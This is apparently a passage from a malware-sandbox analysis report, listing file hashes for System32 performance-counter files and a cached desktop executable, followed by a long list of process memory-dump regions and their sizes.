                                                                                                                                                                                                                                    154KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    f0ecfbfa3e3e59fd02197018f7e9cb84

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    961e9367a4ef3a189466c0a0a186faf8958bdbc4

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    cfa293532a1b865b95093437d82bf8b682132aa335957f0c6d95edfbcc372324

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    116e648cb3b591a6a94da5ef11234778924a2ff9e0b3d7f6f00310d8a58914d12f5ee1b63c2f88701bb00538ad0e42ae2561575333c5a1d63bb8c86863ac6294

                                                                                                                                                                                                                                  • C:\Windows\System32\perfc00C.dat

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    145KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    ce233fa5dc5adcb87a5185617a0ff6ac

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    2e2747284b1204d3ab08733a29fdbabdf8dc55b9

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    68d4de5e72cfd117151c44dd6ec74cf46fafd6c51357895d3025d7dac570ce31

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    1e9c8e7f12d7c87b4faa0d587a8b374e491cd44f23e13fdb64bde3bc6bf3f2a2d3aba5444a13b199a19737a8170ee8d4ead17a883fbaee66b8b32b35b7577fc2

                                                                                                                                                                                                                                  • C:\Windows\System32\perfc010.dat

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    142KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    d73172c6cb697755f87cd047c474cf91

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    abc5c7194abe32885a170ca666b7cce8251ac1d6

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    9de801eebbe32699630f74082c9adea15069acd5afb138c9ecd5d4904e3cdc57

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    7c9e4126bed6bc94a211281eed45cee30452519f125b82b143f78da32a3aac72d94d31757e1da22fb2f8a25099ffddec992e2c60987efb9da9b7a17831eafdf6

                                                                                                                                                                                                                                  • C:\Windows\System32\perfc011.dat

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    114KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    1f998386566e5f9b7f11cc79254d1820

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    e1da5fe1f305099b94de565d06bc6f36c6794481

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    1665d97fb8786b94745295feb616a30c27af84e8a5e1d25cd1bcaf70723040ea

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    a7c9702dd5833f4d6d27ce293efb9507948a3b05db350fc9909af6a48bd649c7578f856b4d64d87df451d0efbe202c62da7fffcac03b3fe72c7caaea553de75f

                                                                                                                                                                                                                                  • C:\Windows\System32\perfh007.dat

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    680KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    b69ab3aeddb720d6ef8c05ff88c23b38

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    d830c2155159656ed1806c7c66cae2a54a2441fa

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    24c81302014118e07ed97eaac0819ecf191e0cc3d69c02b16ecda60ac4718625

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    4c7a99d45fb6e90c206439dcdd7cd198870ea5397a6584bb666eed53a8dc36faaac0b9cfc786a3ab4ecbbecc3a4ddd91560246d83b3319f2e37c1ed4bdbec32d

                                                                                                                                                                                                                                  • C:\Windows\System32\perfh009.dat

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    646KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    aecab86cc5c705d7a036cba758c1d7b0

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    e88cf81fd282d91c7fc0efae13c13c55f4857b5e

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    9bab92e274fcc0af88a7fdd143c9045b9d3a13cac2c00b63f00b320128dcc066

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    e0aa8da41373fc64d0e3dc86c9e92a9dd5232f6bcae42dfe6f79012d7e780de85511a9ec6941cb39476632972573a18063d3ecd8b059b1d008d34f585d9edbe8

                                                                                                                                                                                                                                  • C:\Windows\System32\perfh00A.dat

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    727KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    7d0bac4e796872daa3f6dc82c57f4ca8

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    b4f6bbe08fa8cd0784a94ac442ff937a3d3eea0a

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    ce2ef9fc248965f1408d4b7a1e6db67494ba07a7bbdfa810418b30be66ad5879

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    145a0e8543e0d79fe1a5ce268d710c807834a05da1e948f84d6a1818171cd4ef077ea44ba1fe439b07b095721e0109cbf7e4cfd7b57519ee44d9fd9fe1169a3e

                                                                                                                                                                                                                                  • C:\Windows\System32\perfh00C.dat

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    727KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    5f684ce126de17a7d4433ed2494c5ca9

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    ce1a30a477daa1bac2ec358ce58731429eafe911

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    2e2ba0c47e71991d646ec380cde47f44318d695e6f3f56ec095955a129af1c2c

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    4d0c2669b5002da14d44c21dc2f521fb37b6b41b61bca7b2a9af7c03f616dda9ca825f79a81d3401af626a90017654f9221a6ccc83010ff73de71967fc2f3f5b

                                                                                                                                                                                                                                  • C:\Windows\System32\perfh010.dat

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    722KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    4623482c106cf6cc1bac198f31787b65

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    5abb0decf7b42ef5daf7db012a742311932f6dad

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    eceda45aedbf6454b79f010c891bead3844d43189972f6beeb5ccddb13cc0349

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    afecefcec652856dd8b4275f11d75a68a582337b682309c4b61fd26ed7038b92e6b9aa72c1bfc350ce2caf5e357098b54eb1e448a4392960f9f82e01c447669f

                                                                                                                                                                                                                                  • C:\Windows\System32\perfh011.dat

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    406KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    54c674d19c0ff72816402f66f6c3d37c

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    2dcc0269545a213648d59dc84916d9ec2d62a138

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    646d4ea2f0670691aa5b998c26626ede7623886ed3ac9bc9679018f85e584bb5

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    4d451e9bef2c451cb9e86c7f4d705be65787c88df5281da94012bfbe5af496718ec3e48099ec3dff1d06fee7133293f10d649866fe59daa7951aebe2e5e67c1f

                                                                                                                                                                                                                                  • \Users\Admin\Desktop\._cache_New Text Document mod.exe

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    69994ff2f00eeca9335ccd502198e05b

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    b13a15a5bea65b711b835ce8eccd2a699a99cead

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

                                                                                                                                                                                                                                  • memory/336-398-0x0000000000400000-0x00000000004C4000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    784KB

                                                                                                                                                                                                                                  • memory/336-335-0x0000000000400000-0x00000000004C4000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    784KB

                                                                                                                                                                                                                                  • memory/336-1436-0x00000000037A0000-0x00000000037B7000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/336-213-0x0000000000400000-0x00000000004C4000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    784KB

                                                                                                                                                                                                                                  • memory/336-1458-0x00000000037A0000-0x00000000037B7000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/428-421-0x0000000000F00000-0x0000000000F2B000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    172KB

                                                                                                                                                                                                                                  • memory/428-422-0x000007FEBEE90000-0x000007FEBEEA0000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                  • memory/428-423-0x0000000037840000-0x0000000037850000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                  • memory/428-420-0x0000000000E40000-0x0000000000E64000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    144KB

                                                                                                                                                                                                                                  • memory/428-418-0x0000000000E40000-0x0000000000E64000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    144KB

                                                                                                                                                                                                                                  • memory/472-428-0x0000000000CB0000-0x0000000000CDB000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    172KB

                                                                                                                                                                                                                                  • memory/472-444-0x0000000037840000-0x0000000037850000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                  • memory/472-443-0x000007FEBEE90000-0x000007FEBEEA0000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                  • memory/636-33-0x00000000002C0000-0x00000000002C8000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                                  • memory/636-1415-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/636-1421-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/912-1430-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/964-294-0x0000000000D00000-0x0000000000E30000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    1.2MB

                                                                                                                                                                                                                                  • memory/1192-1626-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1815-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1437-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2234-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1450-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1459-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2235-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1464-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1477-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1492-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1491-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2221-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1526-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1525-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1524-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1523-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1550-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1549-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1565-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1564-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2222-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1627-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2223-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1658-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1657-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1661-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1660-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1703-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1705-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1706-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1704-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1713-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1712-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1722-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1721-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1728-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1727-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1747-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1746-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1787-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1786-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1785-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1784-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1791-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1790-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1795-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1794-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1799-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1798-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1804-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1803-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1810-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1809-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2220-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1814-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1830-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1829-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2171-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2172-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2090-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2091-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2070-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2071-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2065-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2066-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2049-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2050-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2052-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1952-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1955-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1954-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1953-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1980-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1979-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-2054-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1991-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1192-1990-0x000000013F230000-0x000000013F247000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    92KB

                                                                                                                                                                                                                                  • memory/1264-1624-0x0000000000260000-0x0000000000272000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    72KB

                                                                                                                                                                                                                                  • memory/1476-300-0x0000000000400000-0x0000000000526000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    1.1MB

                                                                                                                                                                                                                                  • memory/1476-311-0x0000000000400000-0x0000000000526000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    1.1MB

                                                                                                                                                                                                                                  • memory/1476-299-0x0000000000400000-0x0000000000526000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    1.1MB

                                                                                                                                                                                                                                  • memory/1476-309-0x0000000000400000-0x0000000000526000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    1.1MB

                                                                                                                                                                                                                                  • memory/1476-296-0x0000000000400000-0x0000000000526000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    1.1MB

                                                                                                                                                                                                                                  • memory/1476-308-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                  • memory/1476-302-0x0000000000400000-0x0000000000526000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    1.1MB

                                                                                                                                                                                                                                  • memory/1476-306-0x0000000000400000-0x0000000000526000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    1.1MB

                                                                                                                                                                                                                                  • memory/1476-304-0x0000000000400000-0x0000000000526000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    1.1MB

                                                                                                                                                                                                                                  • memory/1520-406-0x00000000026A0000-0x00000000026A8000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                                  • memory/1520-405-0x000000001B570000-0x000000001B852000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    2.9MB

                                                                                                                                                                                                                                  • memory/2316-2081-0x0000000001020000-0x000000000107E000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    376KB

                                                                                                                                                                                                                                  • memory/2384-199-0x0000000000170000-0x0000000000494000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    3.1MB

                                                                                                                                                                                                                                  • memory/2608-212-0x0000000001260000-0x0000000001584000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    3.1MB

                                                                                                                                                                                                                                  • memory/2636-30-0x0000000000400000-0x00000000004C4000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    784KB

                                                                                                                                                                                                                                  • memory/2688-232-0x0000000000400000-0x00000000004C4000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    784KB

                                                                                                                                                                                                                                  • memory/2760-206-0x0000000000D20000-0x0000000000D72000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    328KB

                                                                                                                                                                                                                                  • memory/2760-410-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    172KB

                                                                                                                                                                                                                                  • memory/2760-414-0x00000000775E0000-0x00000000776FF000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    1.1MB

                                                                                                                                                                                                                                  • memory/2760-415-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    172KB

                                                                                                                                                                                                                                  • memory/2760-412-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    172KB

                                                                                                                                                                                                                                  • memory/2760-407-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    172KB

                                                                                                                                                                                                                                  • memory/2760-409-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    172KB

                                                                                                                                                                                                                                  • memory/2760-413-0x0000000077800000-0x00000000779A9000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    1.7MB

